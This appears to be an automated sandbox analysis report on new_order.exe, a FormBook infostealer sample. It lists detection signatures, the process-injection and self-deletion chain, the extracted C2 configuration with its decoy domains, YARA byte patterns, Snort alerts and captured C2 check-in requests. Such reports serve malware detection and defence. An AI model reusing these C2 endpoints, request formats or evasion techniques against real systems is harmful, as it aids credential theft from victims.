
Windows Analysis Report
new_order.exe

Overview

General Information

Sample Name: new_order.exe
Analysis ID: 562020
MD5: a0e70d1760e60d81e0f4ac2904fa8002
SHA1: 0512dcf545274ac6512abf3fb31a6fff41614280
SHA256: 0cd606362bbe747f3d0c0193675ce46ea2920fba28580b784f50a2969bbb0c27
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • new_order.exe (PID: 1372 cmdline: "C:\Users\user\Desktop\new_order.exe" MD5: A0E70D1760E60D81E0F4AC2904FA8002)
    • new_order.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\new_order.exe" MD5: A0E70D1760E60D81E0F4AC2904FA8002)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6808 cmdline: /c del "C:\Users\user\Desktop\new_order.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.foodgw.com/os16/"], "decoy": ["nautic-experts-hageboelling.com", "fullharvestfundraising.com", "xbdsm.club", "duocaterers.com", "prizebuddy.club", "nillprive.com", "firebreathingpenguin.com", "buxledger.com", "annual-journals.com", "mydemosite0.com", "noaoka.com", "eblaghe-iran.xyz", "globalyuncang.com", "jacqueson-autocars.com", "asiafinances.com", "howtomakearesume.space", "modernwarfaresecrets.com", "dualamaquinaria.com", "thrili.com", "gracing-up.com", "jcrealtydesigns.com", "southaustinmarket.com", "dp-yszxwbhc.com", "cryptolux.store", "yourtechyadda.com", "yogamat-turban.com", "fykori.xyz", "bitherders.com", "strelingcollectibles.com", "undershieldz.com", "youcarboneutral.com", "meetjaykinder.com", "wicked-smokes.com", "wy-bride.com", "dunespro.com", "sallyandterry.com", "theamalfiswim.com", "eleynworld.com", "dreamsinbloomphotography.com", "anaccommodation.com", "slingactivt.com", "rxd-ereecd.com", "immovableproperty.online", "ramziflowers.com", "anthropophony.com", "uncle.finance", "ialife.info", "kennascookies.com", "meta-medical.info", "sexcommittee.com", "royalfountainlogistics.com", "thedefinitionteam.store", "dragonflyessence.com", "momubeauty.com", "alraedest.com", "alcmjd.xyz", "massagecon.com", "nicoletian.com", "rapslearning.online", "dlapi.xyz", "52economics.com", "neurochirurgie-eisner.com", "mbbfocean.xyz", "greenlightiim.com"]}
Source | Rule | Description | Author | Strings
00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source | Rule | Description | Author | Strings
      3.0.new_order.exe.400000.5.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.0.new_order.exe.400000.5.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.new_order.exe.400000.5.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        3.0.new_order.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.0.new_order.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          No Sigma rule has matched

          AV Detection

          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.foodgw.com/os16/"], "decoy": ["nautic-experts-hageboelling.com", "fullharvestfundraising.com", "xbdsm.club", "duocaterers.com", "prizebuddy.club", "nillprive.com", "firebreathingpenguin.com", "buxledger.com", "annual-journals.com", "mydemosite0.com", "noaoka.com", "eblaghe-iran.xyz", "globalyuncang.com", "jacqueson-autocars.com", "asiafinances.com", "howtomakearesume.space", "modernwarfaresecrets.com", "dualamaquinaria.com", "thrili.com", "gracing-up.com", "jcrealtydesigns.com", "southaustinmarket.com", "dp-yszxwbhc.com", "cryptolux.store", "yourtechyadda.com", "yogamat-turban.com", "fykori.xyz", "bitherders.com", "strelingcollectibles.com", "undershieldz.com", "youcarboneutral.com", "meetjaykinder.com", "wicked-smokes.com", "wy-bride.com", "dunespro.com", "sallyandterry.com", "theamalfiswim.com", "eleynworld.com", "dreamsinbloomphotography.com", "anaccommodation.com", "slingactivt.com", "rxd-ereecd.com", "immovableproperty.online", "ramziflowers.com", "anthropophony.com", "uncle.finance", "ialife.info", "kennascookies.com", "meta-medical.info", "sexcommittee.com", "royalfountainlogistics.com", "thedefinitionteam.store", "dragonflyessence.com", "momubeauty.com", "alraedest.com", "alcmjd.xyz", "massagecon.com", "nicoletian.com", "rapslearning.online", "dlapi.xyz", "52economics.com", "neurochirurgie-eisner.com", "mbbfocean.xyz", "greenlightiim.com"]}
          Source: Yara match | File source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: www.foodgw.com/os16/ | Avira URL Cloud: Label: malware
          Source: http://www.bitherders.com/os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj | Avira URL Cloud: Label: malware
          Source: new_order.exe | Joe Sandbox ML: detected
          Source: 3.0.new_order.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.explorer.exe.4e0f840.3.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 3.0.new_order.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.new_order.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.new_order.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.new_order.exe.1acb0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: new_order.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: explorer.pdbUGP | source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP | source: new_order.exe, 00000001.00000003.684420646.000000001AE80000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000001.00000003.688778251.000000001ACF0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb | source: new_order.exe, new_order.exe, 00000003.00000003.689848535.00000000006F0000.00000004.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755436113.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, new_order.exe, 00000003.00000002.755889616.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000009.00000002.947351653.00000000049FF000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.947213320.00000000048E0000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb | source: new_order.exe, 00000003.00000002.756328616.0000000002660000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00402630 FindFirstFileA,

          Networking

          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49806 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49806 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49806 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49829 -> 3.64.163.50:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49829 -> 3.64.163.50:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49829 -> 3.64.163.50:80
          Source: C:\Windows\explorer.exe | Domain query: www.royalfountainlogistics.com
          Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe | Domain query: www.bitherders.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: Malware configuration extractor | URLs: www.foodgw.com/os16/
          Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
          Source: global traffic | HTTP traffic detected: GET /os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj HTTP/1.1 | Host: www.royalfountainlogistics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj HTTP/1.1 | Host: www.bitherders.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 3.64.163.50 3.64.163.50
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 28 Jan 2022 09:35:12 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61f22041-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: new_order.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: new_order.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bitherders.com
          Source: explorer.exe, 00000009.00000002.947761745.00000000052FF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bitherders.com/
          Source: unknown | DNS traffic detected: queries for: www.royalfountainlogistics.com
          Source: global traffic | HTTP traffic detected: GET /os16/?XL3pvD=fPwrUrgVvuqeO931Dg4gzzbtrd7thr2/NsJ/u9TrNiEyg4FeGnR3RlXi6kvbgSn2o0yC&m0Dd=nFQHcLg0mfV8fj HTTP/1.1 | Host: www.royalfountainlogistics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /os16/?XL3pvD=wD4cT7q48NFnhCndHw9GtexQ1GWRT95jx29TDgoZhFSVm5lLt3bl1PAkaHfi4RiaXjL3&m0Dd=nFQHcLg0mfV8fj HTTP/1.1 | Host: www.bitherders.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: C:\Users\user\Desktop\new_order.exe | Code function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara match | File source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.723911761.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.946503989.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.687734511.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.754825305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.755193140.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.new_order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.new_order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.new_order.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.new_order.exe.1acb0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.new_order.exe.1acb0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.698671664.000000001ACB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.946218609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.946443311.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.738390030.000000000E954000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.754910561.00000000004C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.688696186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
